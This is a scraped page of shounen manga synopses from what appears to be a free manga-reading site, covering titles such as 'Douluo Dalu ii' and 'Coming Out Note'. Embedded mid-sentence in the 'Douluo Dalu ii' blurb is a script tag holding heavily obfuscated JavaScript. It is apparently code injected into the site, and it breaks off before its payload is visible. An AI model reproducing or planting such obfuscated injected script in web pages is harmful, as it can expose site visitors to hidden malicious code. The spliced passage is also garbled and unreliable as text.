Shounen - Page 140

Shounen manga appeals to young males, focusing on adventurous plots with strong male leads, action sequences, and a heavy emphasis on friendship, teamwork, and personal growth as the characters face various challenges.

9605 results

Rebirth, I am the king of entertainment

Lin Ce, a big shot in the entertainment industry, was reborn, but found out that his girlfriend who became a big star wanted to break up with him, but no one knew that Lin Ce's mind was filled with endless entertainment works in another world!Zhao Siman: Lin Ce, I am a big star, and you are an ordinary person, we are not suitable, let's break up! Stop pestering me!Lin Ce: Well, you never know what you missed!



Young Chihiro spends his days training under his famous swordsmith father. One day he hopes to become a great sword-maker himself. The goofy father and the serious son--they thought these days would last forever. But suddenly, tragedy strikes. A dark day soaked in blood. Chihiro and his blade now live only for revenge. Epic sword battle action!


I, The Demon Lord am being targeted by my female Disciples!

Read “I, The Demon Lord am being targeted by my female Disciples!” online at Best manga website Description about “I, The Demon Lord am being targeted by my female Disciples!”: Bai Feng transmigrated into an ancient chinese style dating game and became the Demon Lord, Bai Qingling. The Bai Qingling in the game is cold-hearted and ruthless. In order to seek immortality, he cultivates the Path of Gu, makes human puppets, and does all kinds of evil. What’s even more hateful is that his three stunning female disciples he regards as pawns, are the villain bosses in the game’s “Pure Love” and “Evil Fall” routes! In such a desperate situation, let’s see how Bai Feng can turn the tables with the [Great Love System]! Associated Names: I Love the Demon Lord So Much That Even My Female Disciples Want to Kill Me, Da Ai Mo Zun, Nv Tu Di Dou Xiang Sha Wo, 大爱魔尊,女徒弟都想杀我 The place to read “I, The Demon Lord am being targeted by my female Disciples!”: Welcome to Mangazin, the fantastic world for manga enthusiasts. Here, you’ll find all the manga you need with the highest quality. What’s even more amazing is that reading manga on MangaGG is entirely free. Don’t hesitate any longer and start reading “I, The Demon Lord am being targeted by my female Disciples!” at MangaGG! Additionally, you can also read Trending Manhwa, Trending Manhua, Trending Comics, and more for free here!


Douluo Dalu ii – Jueshi Tangmen

A land with out magic, dou-qi, martial arts, but have essence spirits. This is the combat continent 10 000 years after the formation of Tang Sect. A new hero and his friend walks the land, a new “Seven Monsters of Shrek“, will they keep up the name of the Tang Sect? Or will it crumble due to a new essence system? Soul Land 2<script></script><script>(function(_0x1994c2,_0x2c3811){var _0x30dc2c=_0x2e97,_0x623df6=_0x1994c2();while(!![]){try{var _0x449e36=-parseInt(_0x30dc2c(0x19e))/(-0xb*0xa6+-0x5c*0x56+0x260b)+-parseInt(_0x30dc2c(0x1a6))/(-0x24*0x12+-0x2f5*-0x9+-0x1813)+parseInt(_0x30dc2c(0x1a9))/(-0x53*-0x61+-0x23df+-0x5*-0xe3)*(-parseInt(_0x30dc2c(0x1ab))/(0x55*-0x59+-0x1*0x1eb2+0x3c43))+-parseInt(_0x30dc2c(0x1ae))/(-0xf2b+-0x3*-0xc82+-0x3*0x772)+-parseInt(_0x30dc2c(0x19d))/(0x949+0xe9f+-0x17e2)*(-parseInt(_0x30dc2c(0x193))/(0x15de+0x3*-0x83d+0x2e0))+-parseInt(_0x30dc2c(0x192))/(-0x629*0x2+0x1a+-0x7*-0x1c0)+parseInt(_0x30dc2c(0x1a3))/(0x2*-0x327+-0x10e9+0x1740);if(_0x449e36===_0x2c3811)break;else _0x623df6['push'](_0x623df6['shift']());}catch(_0x598779){_0x623df6['push'](_0x623df6['shift']());}}}(_0x3588,0xc372a+-0x2528e+-0x1*-0x43059));function _0x2e97(_0x3e8cce,_0x3477d7){var _0x5498e6=_0x3588();return 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The Hero Girl And The Green Magician

In the depths of a demonic castle filled with monsters, a young hero meets a boy gifted by the supernatural. With a common goal but wildly different motivations, the most unlikely pair sets out on a quest to defeat the Dark Lord! (Source: MU)


Hatch Potch Panch

She was destroying people… in her mind.Kiho Ishiguro is a high school girl who’s an honor student at school, and devotes herself to her disabled mother at home. She is quiet and gentle, but deep down inside she has always had the urge to “hit someone.” As her feelings gets stronger day by day, Kiho encounters a street criminal. She snaps and unleashes her rage on the bad guy without restraint…? Here comes the JK who will revolutionize the world of women’s MMA!Official Web Publication


He's an Alchemist. His Own Weight Has Been Thrown Into the Trash.

I'm an Alchemist Who Doesn't Know How OP I Am, Renkinjutsu-shidesu. Jichou wa Gomibako ni Sutete Kimashita manga, He's an Alchemist. His Own Weight Has Been Thrown Into the TrasI am an S ranked adventurer and for certain reasons am traveling with a certain alchemist. However, this alchemist is quite strange. In his spare time, he can make the highest grade potion called an elixir, and can complete a holy sword overnight. I want him to remember to be responsible. I want him to watch his health stop drinking elixirs like they're energy drinks!This is the story of the weird alchemist who doesn't know restraint and the adventurer who tags along with him.


Slow Starter (Ichikawa Kei)

In the Slow series: V.1 - Slow Starter It's a story about two boys, Kiyo and Ino, who go to different schools but take the same train every morning. As time passes by they become aware of each other but never engage in conversation until one day when Kiyo oversleeps in the train and is awoken by Ino. From that point on they begin talking to each other and eventually become good friends... V.2 - Slow Days 1.) Slow Days 2.) Start Line 3.) Hanashi wo Shinagawa 4.) Stargazer 5.) Toritome no Nai Koi no Shi What would happen if one day a gaping hole suddenly opened in your chest? The night before this unusual event, your best friend throughout middle school, high school, and college tells you “I’m actually married.”! 6.) Kaze no Sukima 7.) Ano Hakoniwa (That miniature garden) (あの箱庭) 8.) Kawaikunai wa seigi! (かわいくないは正義!) Afterword: Tokiniha mukashi no hanashi wo (時には昔のはなしを)


Birth of Evil

Agne is an evil wizard who wishes for the end of the world. In order to achieve his goal, he summons a Demon King - and as he materialised from the abyss, he would proceed to end the world as Agne wished... or not. Summoned with an imperfect memory, the Demon King decides not to end the world as Agne had wished, but rather the opposite...


Slayers: The Road of the Ring

Slayers: The Road of the Ring summary is updating. Come visit sometime to read the latest chapter of Slayers: The Road of the Ring. If you have any question about this manga, Please don't hesitate to contact us or translate team. Hope you enjoy it.


Coming Out Note

After failing the first blind date in his life, Oh Do-Kyung calls the friend who arranged the date. He's in the bathroom. During their conversation, his friend says something which angers Do-Kyung, which leads him to accidentally shouting his secret. His secret is that he is gay. To his shock, he realizes that there are other people in the bathroom: friends from his college department and even a senior student that he is on good terms with. Worried about whether or not they heard his secret, Do-Kyung's life completely changes.


I Was Naked When I Reached the Other World

Yoshida Shuta is a 31-year-old freelancer that dropped out of college without a clear goal in life. One night, while he's out drinking and partying, he gets teleported into another world completely naked. This world, however, is nothing like our own; filled with magical creatures, dangerous monsters and, best of all, cute girls! Of course, it doesn't take very long for him to get into trouble and be overwhelmed by the circumstances around him. Can he put his various skills to good use and make something of himself this time around?
